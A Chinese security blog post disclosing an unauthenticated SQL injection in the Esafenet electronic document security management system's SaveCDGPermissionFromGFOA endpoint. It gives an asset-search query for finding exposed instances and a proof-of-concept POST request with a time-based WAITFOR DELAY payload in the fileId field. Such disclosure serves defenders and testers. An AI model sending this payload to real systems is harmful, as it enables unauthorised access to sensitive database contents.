SQL注入漏洞

guozi • 2024年6月5日下午3:19 • 行业资讯

漏洞信息

由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。

漏洞信息

漏洞复现

复现信息

语法：

app='亿赛通-电子文档安全管理系统'

测绘搜索

POC：

POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 39Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1

漏洞复现

复现信息

复现-1

复现-2

更多内容

发现更多

原创文章，作者：guozi，如若转载，请注明出处：https://www.sudun.com/ask/90243.html

赞 (0)

0 0

要避免的 9 个 SQL 错误

上一篇 2024年6月5日下午3:02

SqlSugar，就这个Feel 倍儿爽！

下一篇 2024年6月5日下午3:20

东兴网

云服务器，这是一个近年来备受关注的行业。它的出现给我们带来了许多便利和惊喜，也改变了我们的生活方式。但是，你知道什么是云服务器吗？它有哪些优势和应用场景？今天，我将带你一探究竟。东…

牛晓晓
行业资讯 2024年4月20日
00
服务器配置文件

服务器配置文件，作为网络安全加速行业中至关重要的一环，它的安全性备受关注。那么什么是服务器配置文件？它又有什么作用？如何保护它的安全？常见的服务器配置文件安全漏洞又有哪些及如何解决…

牛晓晓
行业资讯 2024年3月26日
00
毛豆防火墙的工作原理及配置方法详解

随着网络安全问题日益严峻，网络安全加速行业也逐渐兴起。而在这个行业中，毛豆防火墙作为一款备受瞩目的产品，其工作原理和配置方法备受关注。那么，什么是网络安全加速行业？毛豆防火墙又是如…

牛晓晓
行业资讯 2024年4月13日
00
国外服务器被墙，服务器直接更换ip有影响吗

服务器被封锁是任何互联网人都不愿意面对的问题。但这种情况却频繁发生，给我们的工作和生活带来了很大的问题。那么如何检测您的服务器是否被封锁呢？更改IP 的必要性和影响是什么？解决这些…

牛晓晓
行业资讯 2024年5月6日
00

发表回复